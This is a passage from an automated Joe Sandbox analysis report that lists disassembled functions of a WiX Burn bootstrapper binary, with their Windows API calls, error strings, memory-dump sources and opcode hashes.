                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to add chained patch.$d:\a\wix4\wix4\src\burn\engine\mspengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-1868150798
                                                                                                                                                                                                                                                                            • Opcode ID: b2894c36db398392d89781ae54ab5255124f42a287f3be9215d6484dd43f9772
                                                                                                                                                                                                                                                                            • Instruction ID: 94c522d9e061311e4a137c49ddc1f6e7801aed79b6c948985d7b9cf70c6e7ca7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2894c36db398392d89781ae54ab5255124f42a287f3be9215d6484dd43f9772
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44314D72B04219FFDB04CF58CC859EEB7B9FF45314F108559E924A7291D770A981DB90
                                                                                                                                                                                                                                                                            Function 008E5600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp, xrefs: 008E5641
                                                                                                                                                                                                                                                                            • Failed to resize array while inserting items, xrefs: 008E5632
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to resize array while inserting items$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-1811546269
                                                                                                                                                                                                                                                                            • Opcode ID: 37075a121168dc43e9594d4d667ac2a97dc4a1bcdc0a30b140d96531261d3022
                                                                                                                                                                                                                                                                            • Instruction ID: 8a9fdbea26accdcde5c6209036a91446685c7c5c89425ff10f06cfa25ff6d1b8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37075a121168dc43e9594d4d667ac2a97dc4a1bcdc0a30b140d96531261d3022
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1521C571B00219AFCF04DE69CD86EEFBB69FF95758F504025E805EB351E270E9008BA0
                                                                                                                                                                                                                                                                            Function 009471E2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CBC2: RegOpenKeyExW.KERNELBASE(?,0093CBBE,00000000,00000000,00000003,00000000,?,?,00946603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0093CBED
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,008E6E9A,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 0094728C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to open uninstall key for potential related bundle: %ls, xrefs: 0094721F
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 0094722E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpen
                                                                                                                                                                                                                                                                            • String ID: Failed to open uninstall key for potential related bundle: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 47109696-3466351475
                                                                                                                                                                                                                                                                            • Opcode ID: fccf6f13f21f73512efd7763e08616fff65aba06aa257206b7701e93e40e1823
                                                                                                                                                                                                                                                                            • Instruction ID: 2ba121b265b12e66e7560759162b1725067912a2b97edd88c35ea4340d904adf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fccf6f13f21f73512efd7763e08616fff65aba06aa257206b7701e93e40e1823
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D216A76A0060DBFDB01DFA8C845E9EBBF9EF88314F108425EA55E3251D7B0AE009B51
                                                                                                                                                                                                                                                                            Function 0093C51F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,0093C4F6,00020006,?,?,00000000,00000000,00000000,008F7B5F,00000000,00000000,?,008F7B5F,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce), ref: 0093C55C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                                                            • String ID: Failed to create registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2289755597-627842214
                                                                                                                                                                                                                                                                            • Opcode ID: 2493dd6a62b08ec34c4a89cc7df5acb949ff3c4d2f153921e9328f22775a5f3e
                                                                                                                                                                                                                                                                            • Instruction ID: 286e7c1f5a79e59116a46823ea610399d4109ae220eba37151566b427296f1db
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2493dd6a62b08ec34c4a89cc7df5acb949ff3c4d2f153921e9328f22775a5f3e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D411E5B7604219BBDB109F229C09EAF3EADEBC6750F054029BE04E7250EA31DD11DB70
                                                                                                                                                                                                                                                                            Function 009483E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009439DD: SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439F5
                                                                                                                                                                                                                                                                              • Part of subcall function 009439DD: GetLastError.KERNEL32(?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439FF
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,00000008,00000008,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,?,0094850C), ref: 00948447
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to seek to start point in file., xrefs: 00948416
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 00948425
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorLastPointerWrite
                                                                                                                                                                                                                                                                            • String ID: Failed to seek to start point in file.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 972348794-4104125422
                                                                                                                                                                                                                                                                            • Opcode ID: b6c90381bd65976704d230974f0240080539df36b10b2c210f7bcfd8e253fcde
                                                                                                                                                                                                                                                                            • Instruction ID: f32434779dc91995ceee016001311dc58679c9866247f1294c7f11a9e0fffe2c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6c90381bd65976704d230974f0240080539df36b10b2c210f7bcfd8e253fcde
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A01967165031AFBEB148B58DC4AFAFB76CEB10764F50822AF914D61D1D7B0AE50CAA0
                                                                                                                                                                                                                                                                            Function 0093C83F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,0093D6D1,00000000,008E6EDE,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,008F713E), ref: 0093C860
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                            • String ID: Failed to read registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3660427363-2776790363
                                                                                                                                                                                                                                                                            • Opcode ID: 5ff13e27b4a18c3dc6c31d3176485148fdb80e3042179afead8100d896f5c6b0
                                                                                                                                                                                                                                                                            • Instruction ID: 1b5db3d443c3c22b13bb02fb5ae12f5581927c5918bdc5f63e687e9f06186436
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ff13e27b4a18c3dc6c31d3176485148fdb80e3042179afead8100d896f5c6b0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B0126B6B40A1573D720191B4C09F6B6A9EDBC6B70F15402ABA08FB250ED70CD028BF0
                                                                                                                                                                                                                                                                            Function 008E6CF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: GetProcessHeap.KERNEL32(00000000,?,?,?,0090DE2B,?), ref: 008E55D3
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: RtlFreeHeap.NTDLL(00000000,?,?,0090DE2B,?), ref: 008E55DA
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: GetLastError.KERNEL32(?,?,0090DE2B,?), ref: 008E55E4
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 008F5793
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: FreeLibrary.KERNEL32(?), ref: 008F57BA
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5766: GetLastError.KERNEL32 ref: 008F57C4
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(00000000,000000B0,00000000,000000B0,00000000,00000000,000000FF,000000B0,000000B0,00000000,00000010,00000000), ref: 008E6DBC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008E6DCB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast$AddressCloseCriticalDeleteHandleLibraryProcProcessSection
                                                                                                                                                                                                                                                                            • String ID: .Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2696942647-727612987
                                                                                                                                                                                                                                                                            • Opcode ID: d8cbadaf41916a375e4c5ee9ec6883d970c51cd549f10c60b5a89db99e2e50c2
                                                                                                                                                                                                                                                                            • Instruction ID: 7220ceed7fa15e7c12e2b81cf26a21d6a0fec14b09718ac4247f9918b0eb1847
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8cbadaf41916a375e4c5ee9ec6883d970c51cd549f10c60b5a89db99e2e50c2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6118771A00249EFCF01ABA9CC86FECBBB9FB15319F144026F211E1061E3729A60DB11
                                                                                                                                                                                                                                                                            Function 0093D719 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,008F8FA9,?,00000000,?,?,?,?), ref: 0093D738
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                                            • String ID: Failed to set %ls value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3702945584-457337809
                                                                                                                                                                                                                                                                            • Opcode ID: fe09a0c48393ff49803de5718b387e78fa804cc369cc7501c10589f2ed6862b4
                                                                                                                                                                                                                                                                            • Instruction ID: 409c1319b81e52471b1e9ba345fb3c0e2f677e6cc9a63c641d6fde34cf97e9c7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe09a0c48393ff49803de5718b387e78fa804cc369cc7501c10589f2ed6862b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5F0F67B20126477EB212A176C09E5F3E6DEBC6B60F054025BF1897250E6318C01D6B0
                                                                                                                                                                                                                                                                            Function 008E9960 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 008E997C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E99C0
                                                                                                                                                                                                                                                                            • Failed to set variant value., xrefs: 008E99AE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                                            • String ID: Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1721193555-2731189036
                                                                                                                                                                                                                                                                            • Opcode ID: 42a98748cbb4795b478623062d3340004a9d8cd6e6da2c95c943a385397a8f33
                                                                                                                                                                                                                                                                            • Instruction ID: 4a82c27cbfe21dbcacb7dfc0a1ab59db0453bdcb0b5d7c74f377b89bf98e4c88
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42a98748cbb4795b478623062d3340004a9d8cd6e6da2c95c943a385397a8f33
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39F0F972D016187ADF01EBD9DC0AEDEBBB9FB45714F004425FA54FA190E3B09908CB91
                                                                                                                                                                                                                                                                            Function 0090D2EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E2B25: FormatMessageW.KERNEL32(-000011F7,00000008,?,00000000,00000000,00000000,00000000,80070656,?,?,?,0090D303,00000000,00000008,00000000,80070656), ref: 008E2B56
                                                                                                                                                                                                                                                                              • Part of subcall function 008E2B25: GetLastError.KERNEL32(?,?,?,0090D303,00000000,00000008,00000000,80070656,?,?,008FA7BB,00000001,00000000,80070656,00000000,?), ref: 008E2B63
                                                                                                                                                                                                                                                                              • Part of subcall function 008E2B25: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0090D303,00000000,00000008,00000000,80070656,?,?,008FA7BB,00000001), ref: 008E2BE7
                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,00000000,?,00001010), ref: 0090D349
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to allocate string to display error message, xrefs: 0090D30C
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp, xrefs: 0090D31B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Message$ErrorFormatFreeLastLocal
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate string to display error message$d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2195691534-719764090
                                                                                                                                                                                                                                                                            • Opcode ID: cf909ddcd24fd79829e4af94c013452699443e1b1525d053167d2b472783ded5
                                                                                                                                                                                                                                                                            • Instruction ID: 9d171406a598b9810b9c73979c57ccc4dab637558b4b669383a996c906a3472a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf909ddcd24fd79829e4af94c013452699443e1b1525d053167d2b472783ded5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D01D632941318FBDF259FC58C0AFDD7A68EB01799F148010FA04A50D4D2B49A54E792
                                                                                                                                                                                                                                                                            Function 008E79D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.clean.room,?,?,?,008E1144,?,?,00000000), ref: 008E79EF
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,008E1144,?,?,00000000), ref: 008E7A1F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareStringlstrlen
                                                                                                                                                                                                                                                                            • String ID: burn.clean.room
                                                                                                                                                                                                                                                                            • API String ID: 1433953587-3055529264
                                                                                                                                                                                                                                                                            • Opcode ID: 5a5f080d7cf9838b3a941b19b0173c0cbebe885aa360045e8dd48feeb7b7102c
                                                                                                                                                                                                                                                                            • Instruction ID: 409016a0c2ec922e061e47d92c8b3900d562f8d6c4d0c4ba38589b8c7bb47a46
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a5f080d7cf9838b3a941b19b0173c0cbebe885aa360045e8dd48feeb7b7102c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87F0687261D2705AC7248B679C44D7BFB9DFB577517104129F905D3120D2309981E7A4
                                                                                                                                                                                                                                                                            Function 00940371 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: SysAllocString.OLEAUT32(00000000), ref: 009400C9
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: VariantInit.OLEAUT32(?), ref: 009400D5
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: VariantClear.OLEAUT32(?), ref: 009401C4
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: SysFreeString.OLEAUT32(00000000), ref: 009401CF
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 009403CD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0094039E
                                                                                                                                                                                                                                                                            • Failed to get value from attribute., xrefs: 0094038F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
